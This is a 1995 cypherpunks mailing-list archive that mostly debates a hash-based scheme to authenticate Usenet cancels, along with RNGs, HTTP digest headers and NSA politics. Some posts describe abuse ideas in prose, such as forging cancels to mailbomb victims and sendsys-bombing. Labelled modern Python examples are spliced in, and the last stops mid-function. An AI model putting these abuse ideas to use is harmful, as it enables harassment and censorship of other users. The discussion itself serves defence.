Date: Wed, 4 Oct 95 16:18:36 PDT
To: owner-cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <9510042317.AA14344@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>If the cancel cannot be authenticated (e.g., because the original article lacks
>the "Cancel-lock: M2" header, or the cancel lacks the "Cancel-key: M1" header
>such that H(M1)=M2), then INN should forward the unauthenticated cancel to one
>or more "collection centers" so the author of the original article may be
>notified.

So if 70% of Usenet follows this scheme a handful of forged cancels can easily
cause melt down.

>Each "collection center" daemon should wake up periodically (say, every hour),
>group the collected unauthenticated cancels by message-ids of the cancelled
>articles, and e-mail the (distinct) addresses (other than "usenet@*" or
>"news@*") mentioned in the "From:", "Sender:", "Authorized:", and
>"X-Cancelled-By:" headers, quoting the unauthenticated cancel and the Path's as
>seen at many different sites that forwarded the cancels. This way, if the
>unauthenticated cancel is indeed forged, its author will see within hours that
>it has been fraudulently cancelled _and_ will automatically receive enough
>"Path:" samples from all over the world to see where it was posted, by
>comparing the "Path:" headers in several forwarded copies.

I can post a handful of articles and forge the From line, and create my
own Cancel-lock headers by "rolling the dice."  I can then get their mailbox
bombed by forging cancels.  A little more complicated than "sendsys-bombing"
but not much more so.
	/r$
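
An added example (not part of the original message, and not INN code) of the check the quoted proposal describes: a cancel is authenticated only if the original article carries "Cancel-lock: M2", the cancel carries "Cancel-key: M1", and H(M1)=M2. Assumptions: SHA-256 stands in for the unspecified H, the per-article key derivation is hypothetical, and the bind_message_id option implements the H(X + M1) variant raised later in this thread.

```python
import hashlib
import hmac


def H(data):
    """Stand-in for the thread's unspecified hash H (SHA-256 is an assumption)."""
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


def derive_key(secret, message_id):
    """Hypothetical per-article key M1: HMAC of the message-id under a poster secret."""
    return hmac.new(secret, message_id.encode("utf-8"), hashlib.sha256).hexdigest()


def make_lock(cancel_key, message_id=None):
    """M2 = H(M1), or H(X + M1) when the lock is bound to message-id X."""
    return H(cancel_key if message_id is None else message_id + cancel_key)


def build(headers):
    """Assemble a header block from (name, value) pairs."""
    return "\n".join("%s: %s" % pair for pair in headers) + "\n\nbody\n"


def parse_headers(raw):
    """Parse the header block (up to the first blank line), unfolding continuations."""
    headers, last = {}, None
    for line in raw.splitlines():
        if not line.strip():
            break
        if line[0] in " \t" and last:
            headers[last] += " " + line.strip()
            continue
        name, sep, value = line.partition(":")
        if sep:
            last = name.strip().lower()
            headers[last] = value.strip()
    return headers


def check_cancel(original_raw, cancel_raw, bind_message_id=False):
    """Classify a cancel against the article it names."""
    original = parse_headers(original_raw)
    cancel = parse_headers(cancel_raw)
    msgid = original.get("message-id", "")
    control = cancel.get("control", "").split()
    if len(control) != 2 or control[0].lower() != "cancel" or control[1] != msgid:
        return "not-a-cancel-for-this-article"
    lock = original.get("cancel-lock")
    key = cancel.get("cancel-key")
    if lock is None:
        return "unauthenticated:no-lock"
    if key is None:
        return "unauthenticated:no-key"
    expected = make_lock(key, msgid if bind_message_id else None)
    # Constant-time comparison of the recomputed lock with the stored one.
    if hmac.compare_digest(expected.encode(), lock.lower().encode()):
        return "authenticated"
    return "unauthenticated:mismatch"


# Constructed sample data.
SECRET = b"constructed-poster-secret"
MSGID = "<constructed.1@news.example>"
KEY = derive_key(SECRET, MSGID)

ARTICLE = build([("From", "poster@example.org"), ("Message-ID", MSGID),
                 ("Cancel-lock", make_lock(KEY))])
ARTICLE_BOUND = build([("From", "poster@example.org"), ("Message-ID", MSGID),
                       ("Cancel-lock", make_lock(KEY, MSGID))])
ARTICLE_NO_LOCK = build([("From", "poster@example.org"), ("Message-ID", MSGID)])

CANCEL_GOOD = build([("From", "poster@example.org"),
                     ("Control", "cancel " + MSGID), ("Cancel-key", KEY)])
CANCEL_NO_KEY = build([("From", "poster@example.org"),
                       ("Control", "cancel " + MSGID)])
CANCEL_WRONG_KEY = build([("From", "poster@example.org"),
                          ("Control", "cancel " + MSGID),
                          ("Cancel-key", derive_key(b"someone-else", MSGID))])

if __name__ == "__main__":
    for name, cancel in [("good", CANCEL_GOOD), ("no key", CANCEL_NO_KEY),
                         ("wrong key", CANCEL_WRONG_KEY)]:
        print(name, check_cancel(ARTICLE, cancel))
```

A matching key shows only that the canceller holds the key chosen by whoever posted the article; it says nothing about whether that article's From: line is genuine, which is the gap the reply above points at.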




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 4 Oct 95 17:03:27 PDT
To: cypherpunks@toad.com
Subject: McNeil Lehrer on Net Insecurity
Message-ID: <199510050002.UAA04740@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


McNeil Lehrer has a segment on net boogers this evening, 
reported by Time's anxious Elmer-Dewitt.


Diffie, Farmer and Shimomura, all beautifully coiffed, offer 
sagacious views.


It includes a clip of Kevin, unbeautifully cuffed and mutely 
eloquent. Says most of the charges against him have been 
plea-bargained away.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Wed, 4 Oct 95 18:11:16 PDT
To: cypherpunks@toad.com
Subject: GSS sample/demo?
Message-ID: <199510050115.UAA16284@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the 'broadcast', but I'm looking for some source code that shows
how GSS 'works' in real-world applications, as well as opinions on how good
it is.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 4 Oct 95 20:20:41 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape bug (in version 1.12)
In-Reply-To: <44td0c$3um@tera.mcom.com>
Message-ID: <30734E26.194D@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Ray Cromwell wrote:
>   I agree with a lot of what you say Jeff. What I would do is set the string
> limits to be whatever the specs allow. For instance, in the case of
> domain names, the limit is supposed to be 256. In a mailto: just what
> is the limit of an RFC822 valid e-mail address?

  Yes, we couldn't get to this type of stuff in the 1.12 patch.  We will be
doing this sort of stuff in 2.0.

>   I will say that Netscape is a very robust program. I have created documents
> with 10,000 nested <UL> lists, and the program didn't dump. I have
> created forms with 10,000 selection widgets with overlong labels and variable
> names and it handled them (didn't display them very well) However, I am
> a little weary of netscape allowing lists and forms having 10,000
> levels. For one thing, although the 10,000 nested lists didn't crash
> netscape, they did use up all the swap space on my computer except for
> 300k. A 10K byte document was able to exhaust 32megs of ram.

  On unix you can use the csh(1) limit builtin to limit the size
of your netscape process.  As I understand it, the Mac also has
such a thing.  I'm not sure about windows.  Maybe we should put
a preference in Netscape for how much heap memory to use...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 4 Oct 95 18:22:03 PDT
To: "David K. Merriman" <merriman@arn.net>
Subject: Re: GSS sample/demo?
In-Reply-To: <199510050115.UAA16284@arnet.arn.net>
Message-ID: <199510050121.VAA28274@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Take a look at the kerberos 5 sources.  You can grab krb5 beta 5
from MIT:
	ftp://athena-dist.mit.edu/pub/ATHENA/kerberos

Read the appropriate README file for source download instructions

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 4 Oct 95 13:24:31 PDT
To: aproxy@hplyot.obspm.fr
Subject: New version of my privacy enhanced www proxy is out
Message-ID: <9510042024.AA16962@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



I've thrown into the tclbin-0.6b1.tgz (ftp hplyot.obspm.fr/tcl)
MD5 checksums/digest support, improved server home page 
at http://hplyot.obspm.fr:6661/  that shows your headers,
ongoing support for POST method, online admin config, passwd...

The proxy now issue  "Content-Checksums: md5=xxxxxx"
headers for its stuff, I 'invented' that  syntax, any www guru to tell
me if it already exists under another form ? (i checked the
http docs at w3.org, found nothing)

I'm still waiting for comments and people to use it and start a
network

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

NORAD colonel Mossad cryptographic Chirac Pasqua mururoa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 4 Oct 95 18:25:17 PDT
To: cypherpunks@toad.com
Subject: Re: economic espionage (@#$%^&*) (fwd)
In-Reply-To: <199510031453.PAA12535@utopia.hacktic.nl>
Message-ID: <199510050125.VAA03636@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mr. Nobody --

And everyone else --

Keep this sort of crap out of cypherpunks.

Anonymous writes:
> 
> NY Times, Oct 3, 1995, Business Employment Ad.
> 
> 1984 Sarajevo, Olympics; 1995 Sarajevo, Battleground
> 
> Every day in our world, new threats, new challenges, new
> missions emerge. The people of the Central Intelligence
> Agency are dedicated to meeting the missions of the day,




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 4 Oct 95 18:39:02 PDT
To: hallam@w3.org
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <9510031505.AA11622@zorch.w3.org>
Message-ID: <199510050138.VAA03661@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> 
> There are plenty of other quantum phenomena which can be
> tapped. Essentially all one needs to do is to build a very high gain
> amplifier "baddly". The main difficulty is removing bias.

The main difficulty is that it is extremely hard to prove to yourself
that you are amplifying a quantum phenomenon and not deterministic
noise from the rest of the circuits in the machine or outside it. As
I've said repeatedly, it's nearly impossible to get this wrong with a
radiation detecting mechanism, but it's very very hard to get it right
with most common mechanisms.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 4 Oct 95 22:33:04 PDT
To: Matt Blaze <cypherpunks@toad.com
Subject: Re: Crypto APIs
Message-ID: <199510050532.WAA16394@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:29 PM 10/2/95 -0400, Matt Blaze wrote:
> It seems best to encourage the realistic
> side of NSA as much as possible...

Why? Surely the realists are more dangerous than the nuts.


> [...]
>
> In other
> words, the parts of the military that are concerned with actually
> securing communications want exactly what we want, and are just
> starting to realize it.

This does not necessarily protect our right to cryptography, any
more than it protects our right to full auto guns.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Barrett <barrett@iafrica.com>
Date: Wed, 4 Oct 95 14:00:39 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: New version of my privacy enhanced www proxy is out
In-Reply-To: <9510042024.AA16962@hplyot.obspm.fr>
Message-ID: <Pine.NEB.3.91.951004225636.439y-100000@daisy.ee.und.ac.za>
MIME-Version: 1.0
Content-Type: text/plain


> The proxy now issue  "Content-Checksums: md5=xxxxxx"
> headers for its stuff, I 'invented' that  syntax, any www guru to tell
> me if it already exists under another form ? (i checked the
> http docs at w3.org, found nothing)

RFC 1544 specifies the Content-MD5 header field for use with 
MIME-conformant messages.  It looks like this:

               Content-MD5:  Q2hlY2sgSW50ZWdyaXR5IQ==

--apb (Alan Barrett)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eamon Daly <eamon@cosc.canterbury.ac.nz>
Date: Wed, 4 Oct 95 03:09:55 PDT
To: cypherpunks@toad.com
Subject: Re:  NYT: WWW Usage Monitoring for Marketing
Message-ID: <199510041009.XAA02338@kiwi>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 03 Oct 1995, futplex@pseudonym.com (Futplex) wrote:

[snip]
>In his regular Advertising column, Stuart Elliott discusses the presentation
>of a report on the problem of "assuring accurate and comprehensive measurement
>of consumer exposure to advertisements that appear in interactive media like
>World Wide Web sites and on-line services."
[snip]

Could someone please scan this article and post it to the list, or email it
to me? Thanks.

Eamon Daly
eamon@cosc.canterbury.ac.nz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 4 Oct 95 15:39:36 PDT
To: Alan Barrett <barrett@iafrica.com>
Subject: Re: New version of my privacy enhanced www proxy is out
In-Reply-To: <9510042024.AA16962@hplyot.obspm.fr>
Message-ID: <9510042239.AA17348@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


(BCCed to aproxy list, to avoid followup troubles)
Alan Barrett writes:
 > > The proxy now issue  "Content-Checksums: md5=xxxxxx"
Btw i typoed, I use "Content-Checksum: md5=<hexa/ascii-output>"
like in "Content-Checksum: md5=0246be185424cc79b61f4a55b73362c1"
like does the "md5" and md5sum (pgp's contrib dir) programs
 > > headers for its stuff, I 'invented' that  syntax, any www guru to tell
 > > me if it already exists under another form ? (i checked the
 > > http docs at w3.org, found nothing)
 > 
 > RFC 1544 specifies the Content-MD5 header field for use with 
 > MIME-conformant messages.  It looks like this:
 > 
 >                Content-MD5:  Q2hlY2sgSW50ZWdyaXR5IQ==
Thanks very much for pointing out,

I don't like the fact they somehow hard wired the checksum/digest
algorithm in the keyword name, it is imo a bad idea, when you will want to
use another algorithm, also the rfc state that the checksum applies to
"canonical" form, the one I want applies to the "Content-Length" bytes
you read, whatever they are (no interpretation), and I don't like the
use of base64 which is not nice if you want to check with existing
md5,md5sum programs what you get.

I stepped meanwhile on a draft on authorization scheme using digest, 
which might be interesting... when implemented client side... more on
this later (ref:
http://www.ics.uci.edu/pub/ietf/http/draft-ietf-http-digest-aa-01.txt
see also
http://www.ics.uci.edu/pub/ietf/http/draft-ietf-http-mda-00.txt
for a "mediated digest" authentification/security scheme)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

genetic security Legion of Doom spy CIA munitions Serbian
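
An added example (not part of the original message, and not the proxy's own code) that puts the two header styles discussed above side by side: RFC 1544 "Content-MD5" carries the 16 raw digest bytes in base64, while "Content-Checksum: md5=..." carries the hex string that md5/md5sum print. The verifier hashes the body bytes exactly as received, and the allow-list of algorithm names other than md5 is an assumption.

```python
import base64
import hashlib
import hmac

# Algorithms accepted in "Content-Checksum: <alg>=<hex>". Only md5 appears in
# the thread; the other names are an assumption to show the agile syntax.
ALLOWED_ALGORITHMS = {"md5", "sha1", "sha256"}


def parse_digest_header(line):
    """Return (algorithm, raw_digest_bytes) for either header style."""
    name, sep, value = line.partition(":")
    if not sep:
        raise ValueError("not a header line")
    name, value = name.strip().lower(), value.strip()
    if name == "content-md5":
        algorithm = "md5"
        digest = base64.b64decode(value, validate=True)
    elif name == "content-checksum":
        algorithm, eq, hexdigest = value.partition("=")
        algorithm = algorithm.strip().lower()
        if not eq or algorithm not in ALLOWED_ALGORITHMS:
            raise ValueError("unsupported or malformed checksum: %r" % value)
        digest = bytes.fromhex(hexdigest.strip())
    else:
        raise ValueError("not a digest header: %r" % name)
    # Reject truncated or padded digests before comparing anything.
    if len(digest) != hashlib.new(algorithm).digest_size:
        raise ValueError("wrong digest length for %s" % algorithm)
    return algorithm, digest


def digest_as_hex(line):
    """Hex form of the header's digest, comparable with md5sum output."""
    return parse_digest_header(line)[1].hex()


def verify_body(line, body):
    """Check the body bytes as received (no canonicalisation) against the header."""
    algorithm, expected = parse_digest_header(line)
    actual = hashlib.new(algorithm, body).digest()
    return hmac.compare_digest(actual, expected)


def content_md5_header(body):
    """Build the base64 style header for a body."""
    return "Content-MD5: " + base64.b64encode(hashlib.md5(body).digest()).decode("ascii")


def content_checksum_header(body, algorithm="md5"):
    """Build the hex style header for a body."""
    return "Content-Checksum: %s=%s" % (algorithm, hashlib.new(algorithm, body).hexdigest())


# Constructed sample body; the two header values below are the ones quoted
# in the thread.
BODY = b"<html><body>constructed sample response body</body></html>\n"
RFC_EXAMPLE = "Content-MD5:  Q2hlY2sgSW50ZWdyaXR5IQ=="
THREAD_EXAMPLE = "Content-Checksum: md5=0246be185424cc79b61f4a55b73362c1"

if __name__ == "__main__":
    print(digest_as_hex(RFC_EXAMPLE))
    print(digest_as_hex(THREAD_EXAMPLE))
    for header in (content_md5_header(BODY), content_checksum_header(BODY),
                   content_checksum_header(BODY, "sha256")):
        print(header, verify_body(header, BODY))
```

The RFC's sample value is not a digest of any particular message: its 16 bytes decode to the ASCII text "Check Integrity!".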




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: accw5@glen-net.ca (Ryan Douglas)
Date: Wed, 4 Oct 95 21:01:32 PDT
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <199510050402.AAA22650@sparc1.glen-net.ca>
MIME-Version: 1.0
Content-Type: text/plain


I wish to join the mailing list         

accw5@glen-net.ca





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 5 Oct 95 00:55:26 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: NSA Realists v. Nuts (Was: Re: Crypto APIs)
In-Reply-To: <199510050532.WAA16394@blob.best.net>
Message-ID: <199510050757.DAA22982@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Matt Blaze writes:
# It seems best to encourage the realistic side of NSA as much as possible...

James Donald writes:
> Why? Surely the realists are more dangerous than the nuts.

One way to look at it is this:

Could a Nutty NSA carry out its Nutty Agenda ?

If they could, then we'd better hope someone at Fort Meade does a better job
of promoting a more Realistic (read: free-strong-crypto-friendlier) Agenda.

If they couldn't, then we should focus our energies against the Realistic
Agenda, on the theory that the best NSA agenda is no agenda at all.

(I'm assuming that a Realistic Agenda has at least as good a chance of success
as a Nutty Agenda. If neither has a chance of success, then the distribution
of power among factions in the NSA is obviously irrelevant.)

Personally, I'm plenty cynical enough to fret about a possibility that the
Nuts might achieve their aims to some significant degree. So I'm inclined to
agree with Matt that cheering on the Realists is a wise strategy. 

I'm not sure how much luck we'll have convincing each other about the likely
outcome of the imposition of a Nutty Agenda on the U.S. Looks to me as though
they've imposed some pretty Nutty stuff on us already. Sure, some folks flaunt
the ITARs, but many (like me) fear them. Chalk up a win for the NSA Nuts in my
book.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Thu, 5 Oct 95 01:13:41 PDT
To: cypherpunks@toad.com
Subject: Macneil-Lehrer tonight.
Message-ID: <199510050811.EAA00416@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Whitfield Diffie, Dan Farmer, and another Sun Microsystem guy
whose name I can not spell but who tracked down Kevin Mitnik
are on the Newshour right now.
JMR
No PGP .sig
Regards, Jim Ray

 "Every act of visibility is an act of resistance." Suzanne Pharr
- -----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James Milton Ray   <liberty@gate.net>
- -----------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
_______________________________________________________________________
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHOTMCoZzwIn1bdtAQHsDQF/ZUbX7FTGpQRuuS/vyPIBqlPO9ovW26un
Q5CalRK8OSwX1IuNG0H9Nqj14QhsAfnd
=qUCL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Thomas" <jathomas@netcom.com>
Date: Thu, 5 Oct 95 05:41:42 PDT
To: cypherpunks@toad.com
Subject: Simple hardware RNGs
Message-ID: <Pine.3.89.9510050530.A5942-0100000@netcom5>
MIME-Version: 1.0
Content-Type: text/plain


Having built devices for generating random data, I can tell you the 
problem is more difficult than it appears.  The problem is removing 
biases and correlations from the process.

A good place to start is Murry, Herschell, "A General Approach for 
Generating natural Random Variables", IEEE Transactions on Computers, 
December 1970, p. 1210-1213.

---------------------------------------------------------------------
John A. Thomas          | (214) 263-4351   | jathomas@netcom.com
Bowles & Thomas, L.L.P. |      Voice       | CompuServe 75236,3536
410 N.W Eleventh St.    | (214) 262-6520   | 
Grand Prairie, Tx 75050 |       Fax        | PGP public key available
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Oct 95 07:34:08 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: NSA Realists v. Nuts (Was: Re: Crypto APIs)
Message-ID: <199510051433.HAA11813@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain



Matt Blaze writes:
> > > It seems best to encourage the realistic side of NSA as much as
> > > possible...

James Donald writes:
> > Why? Surely the realists are more dangerous than the nuts.

At 03:57 AM 10/5/95 -0400, Futplex wrote:
> (I'm assuming that a Realistic Agenda has at least as good a chance 
> of success as a Nutty Agenda. [...] )

Language problem:

If that is the case, then the "Nutty Agenda" is perfectly sane.  They 
want to rule over us.  There is nothing crazy about that. Evil yes.  
Crazy no.  Their objective is to create a surveillance state, where 
all actions are known and recorded by the state, in order to 
facilitate detailed state control over every aspect of our lives.  Our 
agenda is the opposite.  There is no commonality of purpose, hence no 
possibility of cooperation.   
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Thu, 5 Oct 95 07:34:16 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
Message-ID: <199510051434.HAA11824@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:11 PM 10/5/95 +1000, David Gerard wrote:
> One thing that occurs to me: suppose I go to control, collect cancel messages,
> and build myself a collection of M1's that will work with a given M2?
>
> That is, I can't actually invert the hashing function. But if a given
> hash function is standard, then I can eventually build up a collection of
> M1s for M2s that will let me cancel quite a few things I may want to.
> How many cancel messages come through in a day?

Considerably less than 340,000,000,000,000,000,000,000,000,000,000,000,000

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 5 Oct 95 07:36:05 PDT
To: cypherpunks@toad.com
Subject: Re: FORGED CANCELS of posts on n.a.n-a.m
In-Reply-To: <44pmiq$h7t@segfault.monkeys.com>
Message-ID: <FXyHcD15w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <45040d$8cd@cougar.vut.edu.au>, gerdw@cougar.vut.edu.au (David Gerard) writes:

>One thing that occurs to me: suppose I go to control, collect cancel messages,
>and build myself a collection of M1's that will work with a given M2?
>
>That is, I can't actually invert the hashing function. But if a given
>hash function is standard, then I can eventually build up a collection of
>M1s for M2s that will let me cancel quite a few things I may want to.

Good point -- if M1 is known to be small in size (say, a 128-bit MD5 of the
article body + newsgroups + message-id + date + secret passphrase), then an
organization with a lot of $$$$$$$ and computing resources (like Co$ or NSA)
might even try to pre-compute M2 = H(M1) for many possible M1's, sort the
result by M2, and build a (partial) lookup table of inverted H. This would be a
humongous table. Would someone bother to do it just to cancel a few Usenet
messages? Possibly.

But I see an easy fix: change Hujskonen and Franz's original proposal so that
an article posted with message-id X contains the header "Cancel-lock: M2",
where M2 is now H(X + M1), not just H(M1). This way, even if two different
articles happen to share the lock M2, they'll need different keys M1's to be
cancelled because their unique message-id's are different. A pre-computed table
of inverse values of H would be useless. To cancel a given X, a brute force
attacker would have to compute M2 = (X + M1) for all possible M1's. Hopefully,
the article X will expire naturally long before this can be done. :)

And in article <9510042317.AA14344@sulphur.osf.org>, Rich Salz <rsalz@osf.org> writes:

>>If the cancel cannot be authenticated (e.g., because the original article lacks
>>the "Cancel-lock: M2" header, or the cancel lacks the "Cancel-key: M1" header
>>such that H(M1)=M2), then INN should forward the unauthenticated cancel to one
>>or more "collection centers" so the author of the original article may be
>>notified.
>
>So if 70% of Usenet follows this scheme a handful of forged cancels can easily
>cause melt down.

(Thank you for looking at this!)

If 70% of Usenet followed this convention and refused to honor unauthenticated
cancels and supersedes, then forged cancels would be much less harmful than
they are now, and there would be less need to notify the victims and to track
down the perpetrators.

Perhaps not _every_ site should send out notifications. The purpose of getting
notifications from multiple sites is to compare the Path: header and see where
it was forged. I suppose notifications from just 5--10 well-positioned sites
would often suffice. But if these sites are well-known, then an attacker might
put their names in the Path: of the forged cancel, to bypass the notification
and still propagate the cancel to a lot of other sites.

We can start implementing this scheme gradually, first by patching our posting
software to insert the "Cancel-lock:/Cancel-Key:" headers, and by running a few
"watchers" based on Homer Wilson Smith's Lazarus that'll notify the poster when
an article with a Cancel-lock: header is being cancelled without a matching
Cancel-Key: -- in all newsgroups, not just in a.r.s. Notifications about
articles without a "Cancel-Key:" header can be added much later, if ever.

>>Each "collection center" daemon should wake up periodically (say, every hour),
>>group the collected unauthenticated cancels by message-ids of the cancelled
>>articles, and e-mail the (distinct) addresses (other than "usenet@*" or
>>"news@*") mentioned in the "From:", "Sender:", "Authorized:", and
>>"X-Cancelled-By:" headers, quoting the unauthenticated cancel and the Path's as
>>seen at many different sites that forwarded the cancels. This way, if the
>>unauthenticated cancel is indeed forged, its author will see within hours that
>>it has been fraudulently cancelled _and_ will automatically receive enough
>>"Path:" samples from all over the world to see where it was posted, by
>>comparing the "Path:" headers in several forwarded copies.
>
>I can post a handful of articles and forge the From line, and create my
>own Cancel-lock headers by "rolling the dice."  I can then get their mailbox
>bombed by forging cancels.  A little more complicated than "sendsys-bombing"
>but not much more so.

Yes -- someone can post an article with random noise in the Cancel-lock:
header, and it would be impossible to cancel except by NoCeM.

As for mailbombing, one can do it much easier by forging a sendsys in the
victim's name, or by e-mailing the victim megabytes of junk from a phoney
"From:" address. This is done, but not too often because the perp is likely to
be tracked down and beaten up. :) Why would someone use this attack and not
straight forged sendsys?

One could address this by limiting the number of notifications e-mailed to one
address or even to one site in a period of time.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
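
The hourly collection-center pass described in the message above, as an added example (not code from the thread, from Lazarus or from INN): it groups forwarded unauthenticated cancels by target message-id, picks notification addresses from the listed headers, finds the Path: tail shared by every copy, and applies the per-address cap suggested at the end of the message. The report tuple layout, the cap value and all hosts and addresses are constructed assumptions.

```python
from collections import defaultdict
from email.utils import getaddresses
from fnmatch import fnmatchcase

# Headers the message lists as sources of notification addresses.
NOTIFY_HEADERS = ("From", "Sender", "Authorized", "X-Cancelled-By")
SKIP_PATTERNS = ("usenet@*", "news@*")   # role accounts are not notified
MAX_PER_ADDRESS = 2                      # assumption: cap per wake-up period


def common_path_tail(paths):
    """Longest run of trailing Path: entries shared by every forwarded copy.

    Each relay prepends its own name, so copies seen at different sites agree
    on the right-hand end of the Path. Entries inside the shared tail can have
    been pre-loaded by the sender; the leftmost shared entry is where the
    copies diverge and is the place to start asking questions.
    """
    split = [p.split("!") for p in paths]
    tail = []
    for entries in zip(*(reversed(s) for s in split)):
        if len(set(entries)) != 1:
            break
        tail.append(entries[0])
    return list(reversed(tail))


def recipients(*header_dicts):
    """Distinct addresses from the notify headers, minus usenet@* and news@*."""
    out = []
    for headers in header_dicts:
        values = [headers[h] for h in NOTIFY_HEADERS if h in headers]
        for _name, addr in getaddresses(values):
            addr = addr.lower()
            skip = any(fnmatchcase(addr, p) for p in SKIP_PATTERNS)
            if addr and not skip and addr not in out:
                out.append(addr)
    return out


def build_notifications(reports):
    """One wake-up of the daemon. reports: list of (reporting_site, headers)."""
    by_target = defaultdict(list)
    for site, headers in reports:
        target = headers["Control"].split(None, 1)[1]   # "cancel <message-id>"
        by_target[target].append((site, headers))

    sent = defaultdict(int)
    notes = []
    for target, items in by_target.items():
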